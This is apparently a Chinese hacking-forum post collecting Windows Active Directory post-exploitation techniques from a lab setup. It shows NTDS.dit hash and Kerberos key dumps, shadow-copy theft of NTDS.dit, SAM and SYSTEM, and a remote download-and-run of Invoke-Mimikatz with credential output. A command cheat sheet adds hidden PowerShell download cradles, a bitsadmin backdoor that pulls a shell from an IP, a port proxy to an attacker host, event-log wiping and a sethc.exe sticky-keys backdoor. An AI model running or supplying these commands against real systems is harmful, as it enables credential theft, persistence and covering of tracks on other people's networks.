     0030   E4 C1 25 24 4F 01 6F AF  88 04 5F 33 89 FE D5 1E   ..%$O.o..._3....[/i][/i][i][i] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[/i][/i][i][i] Searching for pekList, be patient[/i][/i][i][i] PEK # 0 found and decrypted: 0487dfc92c64213bdf39ca382d7baea8[/i][/i][i][i] Reading and decrypting hashes from /home/seclab/windows-2012/ntds/Active Directory/ntds.dit
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc1fc80e9f128261a6bc463cb31e65b5:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    SERVER$:1003:aad3b435b51404eeaad3b435b51404ee:708faf9c9842a10735ecab33cc64ed37:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:23ed7e50c091488d46c46ca69b428979:::
    wchen:1109:aad3b435b51404eeaad3b435b51404ee:fe72ec788d6739b4ac05033fecae793c:::
    jhart:1110:aad3b435b51404eeaad3b435b51404ee:d491885ff154677f71291be4517d7177:::
    SERVER2008$:1111:aad3b435b51404eeaad3b435b51404ee:db96a49b7ecf92cfd3a20b0c8048eef1:::
    john:1112:aad3b435b51404eeaad3b435b51404ee:6944c3f3a4ad58896b5fdb55b29f4fdf:::
    JOHN$:1113:aad3b435b51404eeaad3b435b51404ee:3926a5fc5b0eb8b373ebfc37d2f478d6:::[/i][/i][i][i] Kerberos keys from /home/seclab/windows-2012/ntds/Active Directory/ntds.dit
    SERVER$:aes256-cts-hmac-sha1-96:cc03dbc4f30db35f8f2a3894f3dccea99207f6180db7c9f98a1a363f80986e22
    SERVER$:aes128-cts-hmac-sha1-96:a43c9870cf2798fd86eb502391281df9
    SERVER$:des-cbc-md5:b9ef3b08b55e8998
    krbtgt:aes256-cts-hmac-sha1-96:f5f37669f8fe6b10a3b65dddf09f80f78b1ce1f351e47130adfb70aa81eeff82
    krbtgt:aes128-cts-hmac-sha1-96:a3bea9e21a87976f582de5a9a4c6784a
    krbtgt:des-cbc-md5:028adaf497028076
    wchen:aes256-cts-hmac-sha1-96:c979d56fa938026e30ef8e8959ded691dcdc1abfb62c79e9061e42cb3ea5cd6f
    wchen:aes128-cts-hmac-sha1-96:464ee4707eb40a19d833afe1e5be6244
    wchen:des-cbc-md5:0be69b2ada3dbcf4
    jhart:aes256-cts-hmac-sha1-96:d1bb033c02346050588ac074871f7c13be08952936d0443221de2af820181407
    jhart:aes128-cts-hmac-sha1-96:dc6f858f75486dd03f9b88dd3a0cd41f
    jhart:des-cbc-md5:895d10bf830d7961
    SERVER2008$:aes256-cts-hmac-sha1-96:f88aa76cd58df5804762bcae3607a36566b299394622cd3a04e0f63baa179527
    SERVER2008$:aes128-cts-hmac-sha1-96:ff258dfec8bfb3c0683eafb49799b943
    SERVER2008$:des-cbc-md5:cb5e5e32dfa475b6
    john:aes256-cts-hmac-sha1-96:6fb59e65a4ba99987759e87f4aa2435f155a15233ddc1eb763250d495f94212e
    john:aes128-cts-hmac-sha1-96:7e57a1d9f658456ec4ce24282d80a835
    john:des-cbc-md5:ea8aadecea46e6c4
    JOHN$:aes256-cts-hmac-sha1-96:05edf93acc4dd9c08af27f1c3ee8674185087e5321b57f290ac764c1bfdc025c
    JOHN$:aes128-cts-hmac-sha1-96:529d1632aa0283f7ba2d1c4ca216a22f
    JOHN$:des-cbc-md5:e029798f8f92e0da[/i][/i][i][i] Cleaning up...

    参考

    1. https://www.youtube.com/watch?v=0WyBxwJD_c0
    2. http://www.thegeekstuff.com/2014/11/install-active-directory
    3. How Attackers Dump Active Directory Database Credentials
    4. How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller
    5. Attack Methods for Gaining Domain Admin Rights in Active Directory
    6. Unofficial Guide to Mimikatz & Command Reference

    how-to-use-vssadmin

    Vssadmin

    适用于:Windows Server 2003,Windows Server 2008,Windows Server 2003 R2,Windows Server 2008 R2,Windows Server 2012,Windows 8

    Command Description
    Vssadmin add shadowstorage 添加卷影副本存储关联.
    Vssadmin create shadow 创建一个新卷卷影副本.
    Vssadmin delete shadows 删除卷影副本.
    Vssadmin delete shadowstorage 删除卷影副本存储关联.
    Vssadmin list providers 列出注册卷影复制提供程序.
    Vssadmin list shadows 列出现有的卷影副本.
    Vssadmin list shadowstorage 列出系统上的所有卷影副本存储关联.
    Vssadmin list volumes 列出符合卷影副本的卷.
    Vssadmin list writers 列出系统上所有订阅的卷影复制者.
    Vssadmin resize shadowstorage 调整卷影副本存储关联的最大大小.

    拥有管理员权限

    PS C:\Users\Administrator\Desktop>vssadmin List Shadows
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2005 Microsoft Corp.
    
    Error: You don't have the correct permissions to run this command.  Please run t
    his utility from a command
    window that has elevated administrator privileges.

    List Shadows

    C:\Windows\system32>vssadmin List Shadows
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2005 Microsoft Corp.
    
    No items found that satisfy the query.

    Create Shadow

    C:\Windows\system32>vssadmin Create Shadow /for=C:
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2005 Microsoft Corp.
    
    Successfully created shadow copy for 'C:\'
        Shadow Copy ID: {153b6835-be81-45ed-bd01-2edbf4f61a85}
        Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

    Copy Files

    PS C:\Users\Administrator\Desktop> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
    PS C:\Users\Administrator\Desktop> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C
    :\temp\
    PS C:\Users\Administrator\Desktop> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\t
    emp\
    
    C:\Windows\system32>vssadmin List Shadows
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2005 Microsoft Corp.
    
    Contents of shadow copy set ID: {7b37f005-c738-450c-83cd-ad2f237f2b28}
       Contained 1 shadow copies at creation time: 11/5/2016 1:19:40 AM
          Shadow Copy ID: {153b6835-be81-45ed-bd01-2edbf4f61a85}
             Original Volume: (C:)\\?\Volume{be4f748a-a19f-11e6-a5bb-806e6f6e6963}\
             Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
             Originating Machine: SERVER2008.thegeekstuff.com
             Service Machine: SERVER2008.thegeekstuff.com
             Provider: 'Microsoft Software Shadow Copy provider 1.0'
             Type: ClientAccessible
             Attributes: Persistent, Client-accessible, No auto release, No writers,
     Differential

    Delete Shadows

     C:\Windows\system32>vssadmin Delete Shadows /For=C:
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2005 Microsoft Corp.
    
    Do you really want to delete 1 shadow copies (Y/N): [N]? Y
    
    Successfully deleted 1 shadow copies.

    Invoke-NinjaCopy

    PS C:\Users\Administrator> Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -ComputerName SERVER -localDestination "C:\temp\SYSTEM"
    PS C:\Users\Administrator> Invoke-NinjaCopy -Path "C:\Windows\NTDS\NTDS.dit" -ComputerName SERVER -localDestination "C:\temp\NTDS.dit"

    参考

    1. https://technet.microsoft.com/en-us/library/cc754968(v=ws.11).aspx
    2. Tutorial for NTDS goodness (VSSADMIN, WMIS, NTDS.dit, SYSTEM)
    3. How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller
    4. https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/
    5. https://github.com/clymb3r/PowerShell/blob/master/Invoke-NinjaCopy/Invoke-NinjaCopy.ps1
    6. http://blog.csdn.net/zjull/article/details/11819923

    PowerSploit_Invoke-Mimikatz_in_cmd

    C:\Windows\system32>powershell -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
    
      .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Dec 14 2015 18:03:07)
     .## ^ ##.
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'                                     with 17 modules * * */
    
    mimikatz(powershell) # sekurlsa::logonpasswords
    
    Authentication Id : 0 ; 446842 (00000000:0006d17a)
    Session           : Interactive from 1
    User Name         : test
    Domain            : lab
    Logon Server      : LAB
    Logon Time        : 10/14/2016 6:38:14 AM
    SID               : S-1-5-21-2035202921-1308571849-2301429434-1000
            msv :
             [00000003] Primary
             * Username : test
             * Domain   : lab
             * NTLM     : 8846f7eaee8fb117ad06bdd830b7586c
             * SHA1     : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
             [00010000] CredentialKeys
             * NTLM     : 8846f7eaee8fb117ad06bdd830b7586c
             * SHA1     : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
            tspkg :
             * Username : test
             * Domain   : lab
             * Password : password
            wdigest :
             * Username : test
             * Domain   : lab
             * Password : password
            kerberos :
             * Username : test
             * Domain   : lab
             * Password : (null)
            ssp :
            credman :
    
    Authentication Id : 0 ; 446819 (00000000:0006d163)
    Session           : Interactive from 1
    User Name         : test
    Domain            : lab
    Logon Server      : LAB
    Logon Time        : 10/14/2016 6:38:14 AM
    SID               : S-1-5-21-2035202921-1308571849-2301429434-1000
            msv :
             [00010000] CredentialKeys
             * NTLM     : 8846f7eaee8fb117ad06bdd830b7586c
             * SHA1     : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
             [00000003] Primary
             * Username : test
             * Domain   : lab
             * NTLM     : 8846f7eaee8fb117ad06bdd830b7586c
             * SHA1     : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
            tspkg :
             * Username : test
             * Domain   : lab
             * Password : password
            wdigest :
             * Username : test
             * Domain   : lab
             * Password : password
            kerberos :
             * Username : test
             * Domain   : lab
             * Password : (null)
            ssp :
            credman :
    
    Authentication Id : 0 ; 997 (00000000:000003e5)
    Session           : Service from 0
    User Name         : LOCAL SERVICE
    Domain            : NT AUTHORITY
    Logon Server      : (null)
    Logon Time        : 10/14/2016 6:37:59 AM
    SID               : S-1-5-19
            msv :
            tspkg :
            wdigest :
             * Username : (null)
             * Domain   : (null)
             * Password : (null)
            kerberos :
             * Username : (null)
             * Domain   : (null)
             * Password : (null)
            ssp :
            credman :
    
    Authentication Id : 0 ; 996 (00000000:000003e4)
    Session           : Service from 0
    User Name         : LAB$
    Domain            : WORKGROUP
    Logon Server      : (null)
    Logon Time        : 10/14/2016 6:37:59 AM
    SID               : S-1-5-20
            msv :
            tspkg :
            wdigest :
             * Username : LAB$
             * Domain   : WORKGROUP
             * Password : (null)
            kerberos :
             * Username : lab$
             * Domain   : WORKGROUP
             * Password : (null)
            ssp :
            credman :
    
    Authentication Id : 0 ; 54335 (00000000:0000d43f)
    Session           : UndefinedLogonType from 0
    User Name         : (null)
    Domain            : (null)
    Logon Server      : (null)
    Logon Time        : 10/14/2016 6:37:58 AM
    SID               :
            msv :
            tspkg :
            wdigest :
            kerberos :
            ssp :
            credman :
    
    Authentication Id : 0 ; 999 (00000000:000003e7)
    Session           : UndefinedLogonType from 0
    User Name         : LAB$
    Domain            : WORKGROUP
    Logon Server      : (null)
    Logon Time        : 10/14/2016 6:37:58 AM
    SID               : S-1-5-18
            msv :
            tspkg :
            wdigest :
             * Username : LAB$
             * Domain   : WORKGROUP
             * Password : (null)
            kerberos :
             * Username : lab$
             * Domain   : WORKGROUP
             * Password : (null)
            ssp :
            credman :
    
    mimikatz(powershell) # exit
    Bye!

    Windows_AD_commands

    net view
    net view /domain
    net view /domain:DOMAINNAME
    net view \\domain-control
    net user
    net user /domain
    net localgroup administrators
    net localgroup administrators /domain
    net group /domain
    net group "Domain Admins" /domain
    net group "Domain Computers" /domain
    net group "Domain Controllers" /domain
    net group "Group Policy Creator Owners" /domain
    net time /domain
    net config
    net session
    net use \\ip\ipc$ password /user:username
    net share
    net accounts /domain
    wmic useraccount
    wmic useraccount LIST FULL
    wmic useraccount LIST BRIEF
    wmic useraccount LIST STATUS
    wmic startup
    wmic share
    wmic service
    wmic process where name="[PROCESS]" call terminate
    wmic process where ProcessId="[PID]" call terminate
    wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"
    wmic qfe get hotfixid
    wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber
    wmic bios
    wmic bios LIST FULL
    netsh firewall show conf
    netsh firewall set service type = remotedesktop mode = enable
    netsh firewall add allowedprogram C:\nltest.exe mltest enable
    netsh firewall add portopening tcp 2482 lt enable all
    netsh int portproxy v4tov4 listenport=80 connecthost=[AttackerIP] connectport=80
    netsh wlan show profiles
    netsh wlan export profile folder=. key=clear
    netsh wlan set hostednetwork mode=[allow\|disallow]
    netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent\|temporary
    netsh wlan [start|stop] hostednetwork
    netstat -ano
    netstat -ano -p tcp
    netstat -ano -p udp
    tasklist /V
    tasklist /M
    tasklist /FI "IMAGENAME eq cmd.exe"
    tasklist /FI "PID eq 4060"
    ipconfig /all
    ipconfig /displaydns
    powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"
    powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')"
    bitsadmin /create backdoor
    bitsadmin /addfile backdoor http://192.168.20.10/theshell.exe C:\windows\temp\theshell.exe
    bitsadmin /SETMINRETRYDELAY 88000
    bitsadmin /SETNOTIFYCMDLINE backdoor C:\windows\temp\theshell.exe NULL
    bitsadmin /getnotifycmdline backdoor
    bitsadmin /listfiles backdoor
    bitsadmin /RESUME backdoor     # Run the backdoor
    for /f %a in ('wevtutil el') do @wevtutil cl "%a"
    del %WINDIR%\*.log /a /s /q /f
    sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys
    route print
    arp -a
    qwinsta
    qprocess
    nbtstat -A ip
    fsutil fsinfo drivers
    wmic volume LIST BRIEF
    systeminfo
    at 13:20 /interactive cmd
    type C:\Windows\system32\demo.txt
    gpresult /Z
    dir /b /s | find /I "password"
    FOR /F %f in ('dir /b /s C:\') do find /I "password" %f
    Replacing file as: sethc.exe
    @echo off
    c: > nul\cd\ > nul\cd %SYSTEMROOT%\System32\ > nul
    if exist %SYSTEMROOT%\System32\cmdsys\ rd /q %SYSTEMROOT%\System32\cmdsys\ > nul
    cmd %SYSTEMROOT%\System32\cmdsys\ > nul
    copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul
    copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul
    copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul
    copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul
    exit

    参考

    http://pwnwiki.io/

    搜集的关于后渗透的资料

    后渗透阶段常用技术总结 wooyun whitehatfest 2016
    Meterpreter使用总结(1)
    Meterpreter使用总结(2)之后渗透攻击模块
    Powershell攻击指南黑客后渗透之道系列
    内网渗透测试定位技术总结| MottoIN
    原文evilwing.me


    评分

    参与人数 1魔法币 +5 收起 理由
    红炉点雪 + 5 感谢你的分享,i春秋论坛有你更精彩!.

    查看全部评分

    本帖被以下淘专辑推荐:

    evilwing.me——余生,请多指教。
    发表于 2018-1-12 10:01:04
    换域名了
    我一定会保护你的。
    使用道具 举报 回复
    发表于 2018-1-12 15:14:19

    又被你发现了
    evilwing.me——余生,请多指教。
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册